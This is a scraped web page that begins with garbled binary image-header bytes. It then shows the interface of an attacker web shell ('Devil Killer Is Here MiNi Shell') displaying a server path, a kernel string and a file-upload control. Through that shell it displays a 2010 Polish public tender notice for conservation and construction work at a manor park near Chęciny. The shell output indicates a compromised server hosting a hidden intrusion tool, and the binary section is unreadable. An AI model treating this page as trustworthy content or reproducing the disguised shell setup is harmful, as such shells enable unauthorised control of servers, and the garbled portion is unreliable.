JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100914/290542-N-2010.html

<p class="kh_header"><b>Kielce: Wykonanie prac na potrzeby projektu Tworzenie
kompleksowych terenów inwestycyjnych w Podzamczu koło Chęcin oraz innych niezbędnych prac projektowych,
archeologicznych, konserwatorskich i restauratorskich na terenie dawnego zespołu dworsko - parkowego w Podzamczu koło Chęcin.</b><br>
<b>Numer ogłoszenia: 290542 - 2010; data zamieszczenia: 14.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Naukowo-Technologiczne , ul. Niska 2 H/2, 25-317 Kielce, woj. świętokrzyskie, tel. 41 343 40 50, faks 41 307 44 76.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rcnt.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac na potrzeby projektu Tworzenie
kompleksowych terenów inwestycyjnych w Podzamczu koło Chęcin oraz innych niezbędnych prac projektowych,
archeologicznych, konserwatorskich i restauratorskich na terenie dawnego zespołu dworsko - parkowego w Podzamczu koło Chęcin..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie
prac na potrzeby projektu: Tworzenie kompleksowych terenów inwestycyjnych w Podzamczu koło Chęcin oraz
innych niezbędnych prac projektowych, archeologicznych, konserwatorskich i restauratorskich na terenie dawnego
zespołu dworsko - parkowego w Podzamczu koło Chęcin obejmujących wstępnie, hasłowo ujęty zakres prac, które
to prace przy uwzględnieniu potrzeby zachowania substancji zabytkowej w/w zespołu oraz działań konserwatorskich,
wyszczególnione zostały przez Zamawiającego poniżej: Przeprowadzenie pełnej kwerendy materiałów archiwalnych
dotyczących zagospodarowania terenu dawnego zespołu dworsko - parkowego w Podzamczu koło Chęcin.
Dokonanie oceny stanu zachowania zabytkowej XVII wiecznej bramy triumfalnej Jana III Sobieskiego, znajdującej się
w ciągu aleii lipowej oraz zabytkowych budynków dworu i oficyny poprzez przeprowadzenie wielokierunkowych
badań ( w tym badan laboratoryjnych oraz innych badan jeżeli jest to niezbędne dla realizacji przedmiotu niniejszego
zamówienia wraz ze stosowną dokumentacją w tym zakresie), wykonanie ekspertyz konstrukcyjno - budowlanych
bramy i budynków uwzględniających także w/w badania., w tym w szczególności wyniki poszukiwania zabytkowych
polichromii co stanowić będzie podstawę opracowania programów konserwatorskich i projektów restauracji
obiektów oraz ich najbliższego otoczenia. Opracowanie na podstawie powyższych badań programów
konserwatorskich i niezbędnej dokumentacji określającej postępowanie konserwatorskie przy restauracji w/w bramy
oraz adaptacji pomieszczeń dworu i oficyny na potrzeby obsługi centrum konferencyjno - szkoleniowego oraz
pomieszczeń administracyjno - biurowych RCNT wraz z pozostałą dokumentacją wymaganą prawem w tym
dokumentacją projektową zgodnie z wymogami prawa budowlanego z uwzględnieniem przepisów w zakresie o
prowadzeniu robót na zabytkach nieruchomych, z uzyskaniem wszystkich wymaganych prawem uzgodnień, opinii,
decyzji administracyjnych łącznie z pozwoleniem na budowę. Przeprowadzenie prac restauratorskich oraz
ogólnobudowlanych zw. z ww adaptacją budynków oraz restauracją bramy uwzględniających konserwację substancji zabytkowej. Przeprowadzenie badań archeologicznych, przy zastosowaniu optymalnej techniki i metod
uwzględniających specyfikę terenu oraz sporządzenie stosownej dokumentacji dla potrzeb realizacji przedmiotowego
zamówienia jak i możliwości ich wykorzystania dla celów stworzenia jednolitej koncepcji architektoniczno użytkowej
dotyczącej kompleksowego zagospodarowania terenu dawnego zespołu dworsko parkowego (wskazanymi
badaniami objęty będzie obszar wokół zabytkowych budynków, na którym realizowany jest projekt
współfinansowany z EFRR w ramach RPOWŚ na lata 2007-2013 Tworzenie kompleksowych terenów
inwestycyjnych w Podzamczu koło Chęcin, wyszczególniony w Załączniku graficznym jako obszary: IV A, IV B, IV C,
IV D, V A ORAZ VI C, a także obszar dawnych ogrodów włoskich istniejących pierwotnie na terenie zespołu
dworsko parkowego wyszczególniony w Załączniku graficznym jako obszar IX oraz aleii lipowej wyszczególniony w
Załączniku graficznym jako obszary: I oraz II) Wykonanie prac związanych z opracowaniem inwentaryzacji
dendrologicznej z planem gospodarki dzrzewostanem i analizą wartości inwentaryzowanego dzrzewostanu na terenie
zespołu dworsko parkowego, na którym realizowany jest projekt współfinansowany z EFRR w ramach RPOWŚ na
lata 2007-2013 Tworzenie kompleksowych terenów inwestycyjnych w Podzamczu koło Chęcin, wyszczególnionym w
Załączniku graficznym jako obszary: IV A, IV B, IV C, IV D, V A ORAZ VI C, a także na terenie dawnych ogrodów
włoskich i aleii lipowej zespołu dworsko parkowego, wyszczególnionych w Załączniku graficznym jako obszary: I, II
oraz IX. . W szczególności chodzi o sporządzenie stosownej dokumentacji dla potrzeb realizacji przedmiotowego
zamówienia jak i możliwości ich wykorzystania dla celów stworzenia jednolitej koncepcji architektoniczno użytkowej
dotyczącej kompleksowego zagospodarowania terenu dawnego zespołu dworsko parkowego. Dokumentacja
powyższa będzie podstawą do złożenia wniosków o wydanie decyzji Świętokrzyskiego Wojewódzkiego
Konserwatora Zabytków, w tym na usunięcie drzew i krzewów oraz na prowadzenie prac związanych z pielęgnacją
dzrzewostanu, a także dalszych prac projektowych związanych z zagospodarowaniem parku. Wykonanie
niezbędnych badań hydrogeologicznych, archeologicznych oraz konserwatorskich pozwalających na możliwie wierne
z pierwotnym odtworzenie wyglądu jak i zastosowania istniejącego na terenie zespołu dworsko parkowego układu
wodnego, obejmującego pięć istniejących obecnie stawów, urządzenia wodne oraz kanał. Na podstawie wskazanych
już wyników wielokierunkowych badań specjalistycznych, w tym szczegółowych badań konserwatorskich,
archeologicznych, architektonicznych, ekspertyz konstrukcyjnych, geotechnicznych, hydrogeologicznych i innych
niezbędnych, przy uwzględnieniu wytycznych konserwatorskich opracowanie jednolitej koncepcji architektoniczno -
użytkowej dla całego założenia uwzględniającego wprowadzenie nowych funkcji ( centrum konferencyjno
szkoleniowego), restaurację dawnych ogrodów włoskich oraz alei lipowej, odtworzenie pierwotnego wyglądu i
zastosowania istniejącego na terenie zespołu układu wodnego jak również uwzględniającego samo położenie i
przyszłe otoczenie zespołu, związane z realizacją przez Zamawiającego innych projektów, przy zachowaniu
najbardziej zbliżonego do pierwotnego wyglądu zespołu dworsko - parkowego w Podzamczu koło Chęcin Przy
uwzględnieniu wyników ww badań wykonanie prac mających na celu sporządzenie dokumentacji projektowej budowy
dwóch parkingów dla potrzeb obsługi RCNT położonych przy drodze krajowej nr 7, uwzględnionych w tworzonej
jednolitej koncepcji oraz uzyskanie związanych z tym zakresem wszelkich uzgodnień i zezwoleń wymaganych polskim
ustawodawstwem, oraz dokonanie ewentualnych zgłoszeń, a następnie wykonanie robót budowlanych polegających
na budowie wskazanych parkingów (wskazane parkingi położone będą na obszarze, na którym realizowany jest
projekt współfinansowany z EFRR w ramach RPOWŚ na lata 2007-2013 Tworzenie kompleksowych terenów
inwestycyjnych w Podzamczu koło Chęcin, wyszczególnionym w Załączniku graficznym jako obszary: IV A, IV B) W
oparciu o w/w badania wykonanie wszelkich niezbędnych prac i robót mających na celu realizację powyższej
koncepcji, w zakresie odtworzenia pierwotnego wyglądu oraz funkcji istniejącego układu wodnego, a także
wykonanie niezbędnych prac zabezpieczających oraz oczyszczających urządzenia wodne oraz kanał, w tym
oczyszczenia tafli wody oraz dna stawu, wyprofilowania skarp, prac remontowych urządzeń wodnych układu,
remontu kanału, zapewniający odpływ wody z całego układu, oraz uzyskanie wszelkich uzgodnień i zezwoleń
wymaganych polskim ustawodawstwem, oraz dokonanie ewentualnych zgłoszeń w tym zakresie. Wykonanie
wszelkich niezbędnych prac mających na celu realizację w/w koncepcji w zakresie dotyczącym aleii lipowej, a także
terenu zespołu dworsko parkowego, na którym realizowany jest projekt współfinansowany z EFRR w ramach
RPOWŚ na lata 2007-2013 pn. Tworzenie kompleksowych terenów inwestycyjnych w Podzamczu koło Chęcin,
wyszczególnionego w Załączniku graficznym jako obszary: IV A, IV B, IV C, IV D, V A ORAZ VI C, w tym w
szczególności nasadzenia nowych drzew, usunięcia zbędnych drzew i krzewów, w tym również chorych,
zagrażających pozostałemu drzewostanowi, a także wykonanie wstępnych porządkowych prac, związanych z restauracją ogrodów włoskich w podstawowym zakresie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.50-4, 92.52.20.00-6, 71.42.00.00-8, 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w
wysokości: 100 000,00 PLN (słownie zł: sto tysięcy). Uwaga: wadium nie wnosi się przy składaniu wniosku, do
wniesienia wadium zobowiązani będą Wykonawcy zaproszeni do składania ofert. Wadium może być wniesione w
formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana przez zamawiającego na podstawie
załączonego do oferty oświadczenia (załącznik nr 2 do Ogłoszenia o Dialogu
Konkurencyjnym), metodą spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w zakresie: 3.2.1) Wykonania dokumentacji
projektowej tj.: Wykonawca wykonał w ciągu ostatnich trzech lat przed upływem terminu
składania wniosków o dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, co najmniej dwie dokumentacje projektowe
porównywalne pod względem zakresu i charakteru z przedmiotem zamówienia, dla którego
ma być opracowana dokumentacja projektowa, z podaniem ich wartości, przedmiotu, dat
wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały
wykonane należycie. Za porównywalne zamówienie uważa się wykonanie projektu
konserwatorskiego, programu prac konserwatorskich, lub programu prac restauratorskich
dla każdej w/w dokumentacji projektowej zabytku nieruchomego, 3.2.2) Realizacji prac
konserwatorskich i restauratorskich tj.: Wykonawca wykonał w okresie ostatnich pięciu lat
przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a
jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie prace
konserwatorskie lub restauratorskie o wartości brutto nie mniejszej niż 6.000.000,00 zł
każda z nich, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem
dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki
budowlanej i prawidłowo ukończone. 3.2.3) Realizacji prac archeologicznych Wykonawca
wykonał w ciągu ostatnich trzech lat przed upływem terminu składania wniosków o
dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia działalności jest krótszy
- w tym okresie, co najmniej dwie prace archeologiczne o wartości brutto nie mniejszej niż
100 000,00 zł każda z nich, z podaniem ich wartości, przedmiotu, dat wykonania i
odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane
należycie. 3.2.4) Realizacji prac melioracyjnych, konserwacji rowów, cieków i zbiorników wodnych: Wykonawca wykonał w ciągu ostatnich pięciu lat przed upływem terminu składania
wniosków o dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia działalności
jest krótszy - w tym okresie, co najmniej trzy roboty z zakresu konserwacji i modernizacji
rowów, cieków i zbiorników wodnych o wartości brutto nie mniejszej niż 20 000,00 zł każda z
nich, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem
dokumentu potwierdzającego, że te usługi zostały wykonane należycie. Zamawiający dokona
spełnienie warunku, metodą spełnia/nie spełnia na podstawie złożonych w/w dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana przez zamawiającego na podstawie
załączonego do oferty oświadczenia (załącznik nr 2 do Ogłoszenia o Dialogu
Konkurencyjnym), metodą spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli: 3.4.1) Wykonawca posiada przeciętne
zatrudnienie w okresie ostatnich trzech lat kalendarzowych poprzedzających rok publikacji
ogłoszenia o niniejszym przetargu, a jeżeli okres prowadzenia działalności jest krótszy w tym
okresie, w wysokości co najmniej 40 pracowników, 3.4.2) Dla realizacji prac
konserwatorskich, prac restauratorskich lub badań konserwatorskich: Wykonawca
dysponuje osobą która posiada tytuł zawodowy magistra uzyskany po ukończeniu wyższych
studiów na kierunku konserwacja i restauracja dzieł sztuki lub wyższych studiów w
specjalności w zakresie konserwacji zabytków oraz odbyła po ukończeniu tych studiów co
najmniej 12-miesięczną praktykę zawodową w zakresie konserwacji i badania zabytków.
3.4.3) Dla realizacji prac i badań archeologicznych: Wykonawca dysponuje osobą, która
posiada tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku
archeologia oraz odbyła po ukończeniu tych studiów co najmniej 12-miesięczną praktykę
zawodową w zakresie tych badań. 3.4.4) W zakresie prac dotyczących architektury
krajobrazu w szczególności prac przy pielęgnacji i rewaloryzacji zabytkowych założeń
ogrodowych: Wykonawca dysponuje osobą, która posiada tytuł zawodowy magistra
uzyskany po ukończeniu wyższych studiów,
obejmujących wiadomości w tym zakresie, oraz odbyły po ukończeniu tych studiów co
najmniej 12-miesięczną praktykę zawodową przy konserwacji i pielęgnacji tego rodzaju
terenów objętych ochroną konserwatorską. 3.4.5) Dla kierowania robotami budowlanymi
jako kierownika budowy na zabytku nieruchomym: Wykonawca dysponuje osobą, która
posiada nieograniczone uprawnienia budowlane w specjalności konstrukcyjno - budowlanej
określone przepisami Prawa budowlanego oraz odbyła co najmniej 2-letnią praktykę
zawodową na budowie przy zabytkach nieruchomych. 3.4.6) Dla realizacji i kierowania
robotami w zakresie melioracji wodnych lub w zakresie budowli hydrotechnicznych:
Wykonawca dysponuje osobą posiadającą uprawnienia wykonawcze do prowadzenia i
kierowania robotami w zakresie melioracji wodnych lub w zakresie budowli
hydrotechnicznych. Zamawiający dokona spełnienie warunku, metodą spełnia/nie spełnia na
podstawie złożonych w/w dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli: 3.5.1) Wykonawca posiada środki finansowe
lub zdolność kredytową o łącznej kwocie w wysokości, co najmniej 5.000.000,00 zł. 3.5.2)
Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzenia
działalności gospodarczej na kwotę co najmniej 2.000.000,00 zł. Zamawiający dokona
spełnienie warunku, metodą spełnia/nie spełnia na podstawie złożonych w/w dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

